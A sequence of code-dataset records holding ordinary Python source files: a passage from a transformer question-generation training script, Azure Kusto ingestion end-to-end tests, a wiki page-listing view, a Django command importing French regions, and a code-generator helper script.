make_path(path))\n\ndef log():\n global best_score\n tr_preds, tr_cost = iter_apply(trX[:n_valid], trM[:n_valid])\n va_preds, va_cost = iter_apply(vaX, vaM)\n tr_cost = tr_cost/len(trX[:n_valid])\n va_cost = va_cost/n_valid\n tr_acc = float(target_based_np_rouge(np.reshape(tr_preds, vaX[:, 1:, 0].shape), trX[:n_valid, 1:, 0], delimiter, end)[\"rouge_1/f_score\"])\n va_acc = float(target_based_np_rouge(np.reshape(va_preds, vaX[:, 1:, 0].shape), vaX[:, 1:, 0], delimiter, end)[\"rouge_1/f_score\"])\n logger.log(n_epochs=n_epochs, n_updates=n_updates, tr_cost=tr_cost, va_cost=va_cost, tr_acc=tr_acc, va_acc=va_acc)\n print('%d %d %.3f %.3f %.2f %.2f'%(n_epochs, n_updates, tr_cost, va_cost, tr_acc, va_acc))\n if submit:\n score = va_acc\n if score > best_score:\n best_score = score\n save(os.path.join(save_dir, desc, 'best_params.jl'))\n\ndef predict():\n predictions = iter_predict(teX, teM)\n predictions = np.reshape(predictions, [len(teX), -1])\n if decoder is not None:\n predictions = [\" \".join([decoder.get(token, \"\") for token in np.trim_zeros(prediction,'b')]\n ).replace(\"\",\"\").replace(\"\\n\",\"\").strip() 
for prediction in predictions]\n targets = [\" \".join([decoder.get(token, \"\") for token in np.trim_zeros(target,'b')]\n ).replace(\"\",\"\").replace(\"\\n\",\"\").strip() for target in teX[:, 1:, 0]]\n path = os.path.join(submission_dir, desc)\n os.makedirs(os.path.dirname(path), exist_ok=True)\n with open(path, 'w') as f:\n for i, (prediction, target) in enumerate(zip(predictions, targets)):\n f.write('INDEX: {}\\nPREDICTION: {}\\nTARGET: {}\\n'.format(i, prediction, target))\n f.write('#'*150+'\\n')\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--desc', type=str, default='transformer_qa_gen') # dir args\n parser.add_argument('--log_dir', type=str, default='log/')\n parser.add_argument('--save_dir', type=str, default='save/')\n parser.add_argument('--submission_dir', type=str, default='submission/')\n parser.add_argument('--encoding_dir', type=str, default='data/bpe_encoding/')\n parser.add_argument('--data_dir', type=str, default='data/squad_1.1/')\n parser.add_argument('--pretrained_lm_dir', type=str, default='data/pretrained_language_model_params/')\n parser.add_argument('--use_prev_best', action='store_true')\n parser.add_argument('--submit', action='store_true')\n parser.add_argument('--data_limit', type=int)\n parser.add_argument('--seed', type=int, default=42) # seed\n parser.add_argument('--n_gpu', type=int, default=1) # train args\n parser.add_argument('--n_iter', type=int, default=3)\n parser.add_argument('--n_batch', type=int, default=4)\n parser.add_argument('--n_ctx', type=int, default=512) # model params\n parser.add_argument('--n_embd', type=int, default=768)\n parser.add_argument('--n_head', type=int, default=12)\n parser.add_argument('--n_layer', type=int, default=12)\n parser.add_argument('--embd_pdrop', type=float, default=0.1)\n parser.add_argument('--attn_pdrop', type=float, default=0.1)\n parser.add_argument('--resid_pdrop', type=float, default=0.1)\n parser.add_argument('--max_grad_norm', type=int, default=1) # opt args\n parser.add_argument('--lr', type=float, default=6.25e-5)\n parser.add_argument('--lr_warmup', type=float, default=0.002)\n parser.add_argument('--l2', type=float, default=0.01)\n parser.add_argument('--vector_l2', action='store_true')\n parser.add_argument('--lr_schedule', type=str, default='warmup_linear')\n parser.add_argument('--b1', type=float, default=0.9)\n parser.add_argument('--b2', type=float, default=0.999)\n parser.add_argument('--e', type=float, default=1e-8)\n args = parser.parse_args()\n print(args)\n globals().update(args.__dict__)\n # set seed\n random.seed(seed)\n np.random.seed(seed)\n tf.set_random_seed(seed)\n # log args\n logger = ResultLogger(path=os.path.join(log_dir, '{}.jsonl'.format(desc)), **args.__dict__)\n # handle data \n (trX, trM), (vaX, vaM), (teX, teM), config = gen_squad_data(n_ctx, encoding_dir, data_dir, data_limit=data_limit)\n globals().update(config)\n n_train = len(trX)\n n_valid = len(vaX)\n n_batch_train = n_batch*n_gpu\n n_updates_total = (n_train//n_batch_train)*n_iter\n # place holders\n X_train = tf.placeholder(tf.int32, [n_batch_train, n_ctx, 2])\n M_train = tf.placeholder(tf.float32, [n_batch_train, n_ctx])\n X = tf.placeholder(tf.int32, [None, n_ctx, 2])\n M = tf.placeholder(tf.float32, [None, n_ctx])\n # mgpu train and predict\n train, logits, lm_losses = mgpu_train(X_train, M_train)\n lm_loss = tf.reduce_mean(lm_losses)\n eval_mgpu_logits, eval_mgpu_lm_losses = mgpu_predict(X_train, M_train)\n eval_logits, eval_lm_losses = model(X, M, \n 
n_vocab=n_vocab, n_special=n_special, n_ctx=n_ctx, n_embd=n_embd, \n embd_pdrop=embd_pdrop, n_layer=n_layer, n_head=n_head, attn_pdrop=attn_pdrop, \n resid_pdrop=resid_pdrop, train=False, reuse=True)\n eval_lm_loss = tf.reduce_mean(eval_lm_losses)\n eval_mgpu_lm_loss = tf.reduce_mean(eval_mgpu_lm_losses)\n # params\n params = find_trainable_variables('model')\n sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))\n sess.run(tf.global_variables_initializer())\n # get saved params\n if use_prev_best and os.path.isfile(os.path.join(save_dir, desc, 'best_params.jl')):\n sess.run([p.assign(ip) for p, ip in zip(params, joblib.load(os.path.join(save_dir, desc, 'best_params.jl')))])\n else:\n shapes = json.load(open('{}params_shapes.json'.format(pretrained_lm_dir)))\n offsets = np.cumsum([np.prod(shape) for shape in shapes])\n init_params = [np.load('{}params_{}.npy'.format(pretrained_lm_dir, n)) for n in range(10)]\n init_params = np.split(np.concatenate(init_params, 0), offsets)[:-1]\n init_params = [param.reshape(shape) for param, shape in zip(init_params, shapes)]\n init_params[0] = init_params[0][:n_ctx]\n if n_ctx > 512:\n init_params[0] = np.concatenate([init_params[0], [init_params[0][-1] for i in range(n_ctx-512)]])\n init_params[0] = np.concatenate([init_params[1], (np.random.randn(n_special, n_embd)*0.02).astype(np.float32), init_params[0]], 0)\n del init_params[1]\n sess.run([p.assign(ip) for p, ip in zip(params[:145], init_params[:145])])\n # train, eval, test\n n_updates = 0\n n_epochs = 0\n if submit:\n save(os.path.join(save_dir, desc, 'best_params.jl'))\n best_score = 0\n for i in range(n_iter):\n for xmb, mmb in iter_data(*shuffle(trX, trM, random_state=np.random), n_batch=n_batch_train, truncate=True, verbose=True):\n cost, _ = sess.run([lm_loss, train], {X_train:xmb, M_train:mmb})\n n_updates += 1\n if n_updates in [1000, 2000, 4000, 8000, 16000, 32000] and n_epochs == 0:\n log()\n n_epochs += 1\n log()\n if submit:\n sess.run([p.assign(ip) for p, ip in zip(params, joblib.load(os.path.join(save_dir, desc, 'best_params.jl')))])\n predict()","sub_path":"train_transformer_qa_gen.py","file_name":"train_transformer_qa_gen.py","file_ext":"py","file_size_in_byte":12787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"380127722","text":"\"\"\"E2E tests for ingest_client.\"\"\"\nimport pytest\nimport time\nimport os\nimport uuid\nimport io\n\nfrom azure.kusto.data.request import KustoClient, KustoConnectionStringBuilder\nfrom azure.kusto.ingest.status import KustoIngestStatusQueues\nfrom azure.kusto.ingest import (\n KustoIngestClient,\n KustoStreamingIngestClient,\n IngestionProperties,\n JsonColumnMapping,\n CsvColumnMapping,\n DataFormat,\n ValidationPolicy,\n ValidationOptions,\n ValidationImplications,\n ReportLevel,\n ReportMethod,\n FileDescriptor,\n KustoMissingMappingReferenceError,\n)\n\n# TODO: change this file to use pytest as runner\n\n\nclass Helpers:\n \"\"\"A class to define mappings to deft table.\"\"\"\n\n def __init__(self):\n pass\n\n @staticmethod\n def create_deft_table_csv_mappings():\n \"\"\"A method to define csv mappings to deft table.\"\"\"\n mappings = list()\n mappings.append(CsvColumnMapping(columnName=\"rownumber\", cslDataType=\"int\", ordinal=0))\n mappings.append(CsvColumnMapping(columnName=\"rowguid\", cslDataType=\"string\", ordinal=1))\n mappings.append(CsvColumnMapping(columnName=\"xdouble\", cslDataType=\"real\", ordinal=2))\n 
mappings.append(CsvColumnMapping(columnName=\"xfloat\", cslDataType=\"real\", ordinal=3))\n mappings.append(CsvColumnMapping(columnName=\"xbool\", cslDataType=\"bool\", ordinal=4))\n mappings.append(CsvColumnMapping(columnName=\"xint16\", cslDataType=\"int\", ordinal=5))\n mappings.append(CsvColumnMapping(columnName=\"xint32\", cslDataType=\"int\", ordinal=6))\n mappings.append(CsvColumnMapping(columnName=\"xint64\", cslDataType=\"long\", ordinal=7))\n mappings.append(CsvColumnMapping(columnName=\"xuint8\", cslDataType=\"long\", ordinal=8))\n mappings.append(CsvColumnMapping(columnName=\"xuint16\", cslDataType=\"long\", ordinal=9))\n mappings.append(CsvColumnMapping(columnName=\"xuint32\", cslDataType=\"long\", ordinal=10))\n mappings.append(CsvColumnMapping(columnName=\"xuint64\", cslDataType=\"long\", ordinal=11))\n mappings.append(CsvColumnMapping(columnName=\"xdate\", cslDataType=\"datetime\", ordinal=12))\n mappings.append(CsvColumnMapping(columnName=\"xsmalltext\", cslDataType=\"string\", ordinal=13))\n mappings.append(CsvColumnMapping(columnName=\"xtext\", cslDataType=\"string\", ordinal=14))\n mappings.append(CsvColumnMapping(columnName=\"xnumberAsText\", cslDataType=\"string\", ordinal=15))\n mappings.append(CsvColumnMapping(columnName=\"xtime\", cslDataType=\"timespan\", ordinal=16))\n mappings.append(CsvColumnMapping(columnName=\"xtextWithNulls\", cslDataType=\"string\", ordinal=17))\n mappings.append(CsvColumnMapping(columnName=\"xdynamicWithNulls\", cslDataType=\"dynamic\", ordinal=18))\n return mappings\n\n @staticmethod\n def create_deft_table_json_mappings():\n \"\"\"A method to define json mappings to deft table.\"\"\"\n mappings = list()\n mappings.append(JsonColumnMapping(columnName=\"rownumber\", jsonPath=\"$.rownumber\", cslDataType=\"int\"))\n mappings.append(JsonColumnMapping(columnName=\"rowguid\", jsonPath=\"$.rowguid\", cslDataType=\"string\"))\n mappings.append(JsonColumnMapping(columnName=\"xdouble\", jsonPath=\"$.xdouble\", cslDataType=\"real\"))\n mappings.append(JsonColumnMapping(columnName=\"xfloat\", jsonPath=\"$.xfloat\", cslDataType=\"real\"))\n mappings.append(JsonColumnMapping(columnName=\"xbool\", jsonPath=\"$.xbool\", cslDataType=\"bool\"))\n mappings.append(JsonColumnMapping(columnName=\"xint16\", jsonPath=\"$.xint16\", cslDataType=\"int\"))\n mappings.append(JsonColumnMapping(columnName=\"xint32\", jsonPath=\"$.xint32\", cslDataType=\"int\"))\n mappings.append(JsonColumnMapping(columnName=\"xint64\", jsonPath=\"$.xint64\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xuint8\", jsonPath=\"$.xuint8\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xuint16\", jsonPath=\"$.xuint16\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xuint32\", jsonPath=\"$.xuint32\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xuint64\", jsonPath=\"$.xuint64\", cslDataType=\"long\"))\n mappings.append(JsonColumnMapping(columnName=\"xdate\", jsonPath=\"$.xdate\", cslDataType=\"datetime\"))\n mappings.append(JsonColumnMapping(columnName=\"xsmalltext\", jsonPath=\"$.xsmalltext\", cslDataType=\"string\"))\n mappings.append(JsonColumnMapping(columnName=\"xtext\", jsonPath=\"$.xtext\", cslDataType=\"string\"))\n mappings.append(JsonColumnMapping(columnName=\"xnumberAsText\", jsonPath=\"$.xnumberAsText\", cslDataType=\"string\"))\n mappings.append(JsonColumnMapping(columnName=\"xtime\", jsonPath=\"$.xtime\", cslDataType=\"timespan\"))\n 
mappings.append(JsonColumnMapping(columnName=\"xtextWithNulls\", jsonPath=\"$.xtextWithNulls\", cslDataType=\"string\"))\n mappings.append(JsonColumnMapping(columnName=\"xdynamicWithNulls\", jsonPath=\"$.xdynamicWithNulls\", cslDataType=\"dynamic\"))\n return mappings\n\n\ncluster = \"Dadubovs1.westus\" # \"toshetah\"\ndb_name = \"TestingDatabase\" # \"PythonTest\"\ntable_name = \"Deft\"\n\n\nengine_kcsb = KustoConnectionStringBuilder.with_aad_device_authentication(\"https://{}.kusto.windows.net\".format(cluster))\ndm_kcsb = KustoConnectionStringBuilder.with_aad_device_authentication(\"https://ingest-{}.kusto.windows.net\".format(cluster))\nclient = KustoClient(engine_kcsb)\ningest_client = KustoIngestClient(dm_kcsb)\ningest_status_q = KustoIngestStatusQueues(ingest_client)\n\nstreaming_ingest_client = KustoStreamingIngestClient(engine_kcsb)\n\nclient.execute(db_name, \".drop table {} ifexists\".format(table_name))\n\n\n@pytest.mark.run(order=1)\ndef test_csv_ingest_non_existing_table():\n csv_ingest_props = IngestionProperties(\n db_name, table_name, dataFormat=DataFormat.CSV, mapping=Helpers.create_deft_table_csv_mappings(), reportLevel=ReportLevel.FailuresAndSuccesses\n )\n csv_file_path = os.path.join(os.getcwd(), \"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.csv\")\n zipped_csv_file_path = os.path.join(os.getcwd(), \"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.csv.gz\")\n\n for f in [csv_file_path, zipped_csv_file_path]:\n ingest_client.ingest_from_file(f, csv_ingest_props)\n\n successes = 0\n timeout = 60\n while successes != 2 and timeout > 0:\n while ingest_status_q.success.is_empty() and timeout > 0:\n time.sleep(1)\n timeout -= 1\n\n success_message = ingest_status_q.success.pop()\n\n assert success_message[0].Database == db_name\n assert success_message[0].Table == table_name\n\n successes += 1\n\n assert successes == 2\n # TODO: status queues only mark ingestion was successful, but takes time for data to become available\n time.sleep(20)\n response = client.execute(db_name, \"{} | count\".format(table_name))\n for row in response.primary_results[0]:\n assert int(row[\"Count\"]) == 20, \"{0} | count = {1}\".format(table_name, str(row[\"Count\"]))\n\n\njson_file_path = os.path.join(os.getcwd(), \"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.json\")\nzipped_json_file_path = os.path.join(os.getcwd(), \"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.jsonz.gz\")\n\n\n@pytest.mark.run(order=2)\ndef test_json_ingest_existing_table():\n json_ingestion_props = IngestionProperties(\n db_name, table_name, dataFormat=DataFormat.JSON, mapping=Helpers.create_deft_table_json_mappings(), reportLevel=ReportLevel.FailuresAndSuccesses\n )\n\n for f in [json_file_path, zipped_json_file_path]:\n ingest_client.ingest_from_file(f, json_ingestion_props)\n\n successes = 0\n timeout = 60\n\n while successes != 2 and timeout > 0:\n while ingest_status_q.success.is_empty() and timeout > 0:\n time.sleep(1)\n timeout -= 1\n\n success_message = ingest_status_q.success.pop()\n\n assert success_message[0].Database == db_name\n assert success_message[0].Table == table_name\n\n successes += 1\n\n assert successes == 2\n # TODO: status queues only mark ingestion was successful, but takes time for data to become available\n time.sleep(20)\n response = client.execute(db_name, \"{} | count\".format(table_name))\n for row in response.primary_results[0]:\n assert int(row[\"Count\"]) == 24, \"{0} | count = {1}\".format(table_name, 
str(row[\"Count\"]))\n\n\n@pytest.mark.run(order=3)\ndef test_ingest_complicated_props():\n # Test ingest with complicated ingestion properties\n validation_policy = ValidationPolicy(\n validationOptions=ValidationOptions.ValidateCsvInputConstantColumns, validationImplications=ValidationImplications.Fail\n )\n json_ingestion_props = IngestionProperties(\n db_name,\n table_name,\n dataFormat=DataFormat.JSON,\n mapping=Helpers.create_deft_table_json_mappings(),\n additionalTags=[\"a\", \"b\"],\n ingestIfNotExists=[\"aaaa\", \"bbbb\"],\n ingestByTags=[\"ingestByTag\"],\n dropByTags=[\"drop\", \"drop-by\"],\n flushImmediately=False,\n reportLevel=ReportLevel.FailuresAndSuccesses,\n reportMethod=ReportMethod.Queue,\n validationPolicy=validation_policy,\n )\n\n file_paths = [json_file_path, zipped_json_file_path]\n fds = [FileDescriptor(fp, 0, uuid.uuid4()) for fp in file_paths]\n source_ids = [\"{}\".format(fd.source_id) for fd in fds]\n\n for fd in fds:\n ingest_client.ingest_from_file(fd, json_ingestion_props)\n\n successes = 0\n timeout = 60\n while successes != 2 and timeout > 0:\n while ingest_status_q.success.is_empty() and timeout > 0:\n time.sleep(1)\n timeout -= 1\n\n success_message = ingest_status_q.success.pop()\n if success_message[0].IngestionSourceId in source_ids:\n assert success_message[0].Database == db_name\n assert success_message[0].Table == table_name\n\n successes += 1\n\n assert successes == 2\n # TODO: status queues only mark ingestion was successful, but takes time for data to become available\n time.sleep(20)\n response = client.execute(db_name, \"{} | count\".format(table_name))\n for row in response.primary_results[0]:\n assert int(row[\"Count\"]) == 28, \"{0} | count = {1}\".format(table_name, str(row[\"Count\"]))\n\n\n@pytest.mark.run(order=4)\ndef test_json_ingestion_ingest_by_tag():\n json_ingestion_props = IngestionProperties(\n db_name,\n table_name,\n dataFormat=DataFormat.JSON,\n mapping=Helpers.create_deft_table_json_mappings(),\n ingestIfNotExists=[\"ingestByTag\"],\n reportLevel=ReportLevel.FailuresAndSuccesses,\n dropByTags=[\"drop\", \"drop-by\"],\n )\n ops = []\n for f in [json_file_path, zipped_json_file_path]:\n ingest_client.ingest_from_file(f, json_ingestion_props)\n\n successes = 0\n timeout = 60\n while successes != 2 and timeout > 0:\n while ingest_status_q.success.is_empty() and timeout > 0:\n time.sleep(1)\n timeout -= 1\n\n success_message = ingest_status_q.success.pop()\n\n assert success_message[0].Database == db_name\n assert success_message[0].Table == table_name\n\n successes += 1\n\n assert successes == 2\n # TODO: status queues only mark ingestion was successful, but takes time for data to become available\n time.sleep(20)\n response = client.execute(db_name, \"{} | count\".format(table_name))\n for row in response.primary_results[0]:\n assert int(row[\"Count\"]) == 28, \"{0} | count = {1}\".format(table_name, str(row[\"Count\"]))\n\n\n@pytest.mark.run(order=5)\ndef test_tsv_ingestion_csv_mapping():\n tsv_ingestion_props = IngestionProperties(\n db_name, table_name, dataFormat=DataFormat.TSV, mapping=Helpers.create_deft_table_csv_mappings(), reportLevel=ReportLevel.FailuresAndSuccesses\n )\n tsv_file_path = os.path.join(os.getcwd(), \"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.tsv\")\n\n ingest_client.ingest_from_file(tsv_file_path, tsv_ingestion_props)\n\n successes = 0\n timeout = 60\n while successes != 1 and timeout > 0:\n while ingest_status_q.success.is_empty() and timeout > 0:\n time.sleep(1)\n timeout -= 1\n\n 
success_message = ingest_status_q.success.pop()\n\n assert success_message[0].Table == table_name\n assert success_message[0].Database == db_name\n\n successes += 1\n\n assert successes == 1\n # TODO: status queues only mark ingestion was successful, but takes time for data to become available\n time.sleep(20)\n response = client.execute(db_name, \"{} | count\".format(table_name))\n for row in response.primary_results[0]:\n assert int(row[\"Count\"]) == 38, \"{0} | count = {1}\".format(table_name, str(row[\"Count\"]))\n\n\n@pytest.mark.run(order=6)\ndef test_streaming_ingest_from_opened_file():\n current_dir = os.getcwd()\n path_parts = [\"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.csv\"]\n missing_path_parts = []\n for path_part in path_parts:\n if path_part not in current_dir:\n missing_path_parts.append(path_part)\n\n file_path = os.path.join(current_dir, *missing_path_parts)\n stream = open(file_path, \"r\")\n ingestion_properties = IngestionProperties(database=db_name, table=table_name, dataFormat=DataFormat.CSV)\n ingest_client.ingest_from_stream(stream, ingestion_properties=ingestion_properties)\n\n\n@pytest.mark.run(order=7)\ndef test_streaming_ingest_form_csv_file():\n current_dir = os.getcwd()\n path_parts = [\"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.csv\"]\n missing_path_parts = []\n for path_part in path_parts:\n if path_part not in current_dir:\n missing_path_parts.append(path_part)\n\n file_path = os.path.join(current_dir, *missing_path_parts)\n\n ingestion_properties = IngestionProperties(database=db_name, table=table_name, dataFormat=DataFormat.CSV)\n ingest_client.ingest_from_file(file_path, ingestion_properties=ingestion_properties)\n\n path_parts = [\"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.csv.gz\"]\n missing_path_parts = []\n for path_part in path_parts:\n if path_part not in current_dir:\n missing_path_parts.append(path_part)\n\n file_path = os.path.join(current_dir, *missing_path_parts)\n\n ingest_client.ingest_from_file(file_path, ingestion_properties=ingestion_properties)\n\n\n@pytest.mark.run(order=8)\ndef test_streaming_ingest_from_json_no_mapping():\n ingestion_properties = IngestionProperties(database=db_name, table=table_name, dataFormat=DataFormat.JSON)\n try:\n current_dir = os.getcwd()\n path_parts = [\"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.json\"]\n missing_path_parts = []\n for path_part in path_parts:\n if path_part not in current_dir:\n missing_path_parts.append(path_part)\n\n file_path = os.path.join(current_dir, *missing_path_parts)\n ingest_client.ingest_from_file(file_path, ingestion_properties=ingestion_properties)\n except KustoMissingMappingReferenceError:\n pass\n\n try:\n byte_sequence = b'{\"rownumber\": 0, \"rowguid\": \"00000000-0000-0000-0001-020304050607\", \"xdouble\": 0.0, \"xfloat\": 0.0, \"xbool\": 0, \"xint16\": 0, \"xint32\": 0, \"xint64\": 0, \"xunit8\": 0, \"xuint16\": 0, \"xunit32\": 0, \"xunit64\": 0, \"xdate\": \"2014-01-01T01:01:01Z\", \"xsmalltext\": \"Zero\", \"xtext\": \"Zero\", \"xnumberAsText\": \"0\", \"xtime\": \"00:00:00\", \"xtextWithNulls\": null, \"xdynamicWithNulls\": \"\"}'\n bytes_stream = io.BytesIO(byte_sequence)\n ingest_client.ingest_from_stream(bytes_stream, ingestion_properties=ingestion_properties)\n except KustoMissingMappingReferenceError:\n pass\n\n\n@pytest.mark.run(order=9)\ndef test_streaming_ingest_from_json_file():\n current_dir = os.getcwd()\n path_parts = [\"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.json\"]\n missing_path_parts = 
[]\n for path_part in path_parts:\n if path_part not in current_dir:\n missing_path_parts.append(path_part)\n\n file_path = os.path.join(current_dir, *missing_path_parts)\n ingestion_properties = IngestionProperties(database=db_name, table=table_name, dataFormat=DataFormat.JSON, mappingReference=\"JsonMapping\")\n ingest_client.ingest_from_file(file_path, ingestion_properties=ingestion_properties)\n\n path_parts = [\"azure-kusto-ingest\", \"tests\", \"input\", \"dataset.jsonz.gz\"]\n missing_path_parts = []\n for path_part in path_parts:\n if path_part not in current_dir:\n missing_path_parts.append(path_part)\n\n file_path = os.path.join(current_dir, *missing_path_parts)\n\n ingest_client.ingest_from_file(file_path, ingestion_properties=ingestion_properties)\n\n\n@pytest.mark.run(order=10)\ndef test_streaming_ingest_from_io_streams():\n ingestion_properties = IngestionProperties(database=db_name, table=table_name, dataFormat=DataFormat.CSV)\n byte_sequence = b'0,00000000-0000-0000-0001-020304050607,0,0,0,0,0,0,0,0,0,0,2014-01-01T01:01:01.0000000Z,Zero,\"Zero\",0,00:00:00,,null'\n bytes_stream = io.BytesIO(byte_sequence)\n ingest_client.ingest_from_stream(bytes_stream, ingestion_properties=ingestion_properties)\n\n str_sequence = '0,00000000-0000-0000-0001-020304050607,0,0,0,0,0,0,0,0,0,0,2014-01-01T01:01:01.0000000Z,Zero,\"Zero\",0,00:00:00,,null'\n str_stream = io.StringIO(str_sequence)\n ingest_client.ingest_from_stream(str_stream, ingestion_properties=ingestion_properties)\n\n byte_sequence = b'{\"rownumber\": 0, \"rowguid\": \"00000000-0000-0000-0001-020304050607\", \"xdouble\": 0.0, \"xfloat\": 0.0, \"xbool\": 0, \"xint16\": 0, \"xint32\": 0, \"xint64\": 0, \"xunit8\": 0, \"xuint16\": 0, \"xunit32\": 0, \"xunit64\": 0, \"xdate\": \"2014-01-01T01:01:01Z\", \"xsmalltext\": \"Zero\", \"xtext\": \"Zero\", \"xnumberAsText\": \"0\", \"xtime\": \"00:00:00\", \"xtextWithNulls\": null, \"xdynamicWithNulls\": \"\"}'\n bytes_stream = io.BytesIO(byte_sequence)\n ingestion_properties.format = DataFormat.JSON\n\n ingestion_properties.ingestion_mapping_reference = \"JsonMapping\"\n ingest_client.ingest_from_stream(bytes_stream, ingestion_properties=ingestion_properties)\n\n str_sequence = u'{\"rownumber\": 0, \"rowguid\": \"00000000-0000-0000-0001-020304050607\", \"xdouble\": 0.0, \"xfloat\": 0.0, \"xbool\": 0, \"xint16\": 0, \"xint32\": 0, \"xint64\": 0, \"xunit8\": 0, \"xuint16\": 0, \"xunit32\": 0, \"xunit64\": 0, \"xdate\": \"2014-01-01T01:01:01Z\", \"xsmalltext\": \"Zero\", \"xtext\": \"Zero\", \"xnumberAsText\": \"0\", \"xtime\": \"00:00:00\", \"xtextWithNulls\": null, \"xdynamicWithNulls\": \"\"}'\n str_stream = io.StringIO(str_sequence)\n ingest_client.ingest_from_stream(str_stream, ingestion_properties=ingestion_properties)\n\n byte_sequence = b'0,00000000-0000-0000-0001-020304050607,0,0,0,0,0,0,0,0,0,0,2014-01-01T01:01:01.0000000Z,Zero,\"Zero\",0,00:00:00,,null' * 600000\n bytes_stream = io.BytesIO(byte_sequence)\n\n try:\n ingest_client.ingest_from_stream(bytes_stream, ingestion_properties=ingestion_properties)\n except KustoStreamMaxSizeExceededError:\n pass\n\n\n@pytest.mark.run(order=11)\ndef test_streaming_ingest_from_dataframe():\n from pandas import DataFrame\n\n fields = [\n \"rownumber\",\n \"rowguid\",\n \"xdouble\",\n \"xfloat\",\n \"xbool\",\n \"xint16\",\n \"xint32\",\n \"xint64\",\n \"xunit8\",\n \"xuint16\",\n \"xunit32\",\n \"xunit64\",\n \"xdate\",\n \"xsmalltext\",\n \"xtext\",\n \"xnumberAsText\",\n \"xtime\",\n \"xtextWithNulls\",\n \"xdynamicWithNulls\",\n ]\n rows = 
[[0, \"00000000-0000-0000-0001-020304050607\", 0.0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, \"2014-01-01T01:01:01Z\", \"Zero\", \"Zero\", \"0\", \"00:00:00\", None, \"\"]]\n df = DataFrame(data=rows, columns=fields)\n ingestion_properties = IngestionProperties(database=db_name, table=table_name, dataFormat=DataFormat.CSV)\n ingest_client.ingest_from_dataframe(df, ingestion_properties)\n","sub_path":"azure-kusto-ingest/tests/e2e.py","file_name":"e2e.py","file_ext":"py","file_size_in_byte":19788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"310688277","text":"from pysite.base_route import RouteView\nfrom pysite.mixins import DBMixin\n\n\nclass PageView(RouteView, DBMixin):\n path = \"/special/all_pages\"\n name = \"special.all_pages\"\n table_name = \"wiki\"\n\n def get(self):\n pages = self.db.pluck(self.table_name, \"title\", \"slug\")\n pages = sorted(pages, key=lambda d: d.get(\"title\", \"No Title\"))\n\n letters = {}\n\n for page in pages:\n if \"title\" not in page:\n page[\"title\"] = \"No Title\"\n\n letter = page[\"title\"][0].upper()\n\n if letter not in letters:\n letters[letter] = []\n\n letters[letter].append(page)\n\n return self.render(\"wiki/special_all.html\", letters=letters)\n","sub_path":"pysite/views/wiki/special/all_pages.py","file_name":"all_pages.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"407521085","text":"import json\n\nfrom django.db import transaction\nfrom django.core.management.base import BaseCommand\nfrom django.conf import settings\n\nfrom geofr.models import Perimeter\nfrom geofr.constants import OVERSEAS_REGIONS\n\n\nDATA_PATH = '/node_modules/@etalab/decoupage-administratif/data/regions.json'\n\n\nclass Command(BaseCommand):\n \"\"\"Import the list of all regions.\"\"\"\n\n @transaction.atomic()\n def handle(self, *args, **options):\n\n france = Perimeter.objects.get(\n scale=Perimeter.TYPES.country,\n code='FRA')\n europe = Perimeter.objects.get(\n scale=Perimeter.TYPES.continent,\n code='EU')\n\n PerimeterContainedIn = Perimeter.contained_in.through\n perimeter_links = []\n\n data_file = settings.DJANGO_ROOT + DATA_PATH\n data = json.loads(data_file.read_file())\n nb_created = 0\n nb_updated = 0\n\n for entry in data:\n\n # Create or update the region perimeters\n region, created = Perimeter.objects.update_or_create(\n scale=Perimeter.TYPES.region,\n code=entry['code'],\n defaults={\n 'name': entry['nom'],\n 'is_overseas': (entry['code'] in OVERSEAS_REGIONS),\n }\n )\n if created:\n nb_created += 1\n else:\n nb_updated += 1\n\n perimeter_links.append(PerimeterContainedIn(\n from_perimeter_id=region.id,\n to_perimeter_id=europe.id))\n perimeter_links.append(PerimeterContainedIn(\n from_perimeter_id=region.id,\n to_perimeter_id=france.id))\n\n # Create the links between the regions and France / Europe\n PerimeterContainedIn.objects.bulk_create(\n perimeter_links, ignore_conflicts=True)\n\n self.stdout.write(self.style.SUCCESS(\n '%d regions created, %d updated.' 
% (nb_created, nb_updated)))\n","sub_path":"src/geofr/management/commands/populate_regions.py","file_name":"populate_regions.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"57913658","text":"# @author Piotr Nikiel \n\nimport sys\nimport os\nsys.path.insert(0, 'FrameworkInternals')\n\nfrom transformDesign import transformDesign\n\ndef runGenerator(className,uaoDirectory='UaoForQuasar', namespace='UaoClient'):\n output_header = os.path.join(uaoDirectory,'generated','{0}.h'.format(className))\n output_body = os.path.join(uaoDirectory,'generated','{0}.cpp'.format(className))\n additionalParam=['className={0}'.format(className), 'namespace={0}'.format(namespace)]\n transformDesign(\n xsltTransformation=os.path.join(uaoDirectory, 'xslt', 'designToClassHeader.xslt'), \n outputFile=output_header, \n requiresMerge=False, \n astyleRun=True, \n additionalParam=additionalParam)\n\n transformDesign(\n xsltTransformation=os.path.join(uaoDirectory, 'xslt', 'designToClassBody.xslt'), \n outputFile=output_body, \n requiresMerge=False, \n astyleRun=True, \n additionalParam=additionalParam)\n \ndef main():\n className = sys.argv[1]\n runGenerator(className)\n \nif __name__==\"__main__\":\n main()\n \n 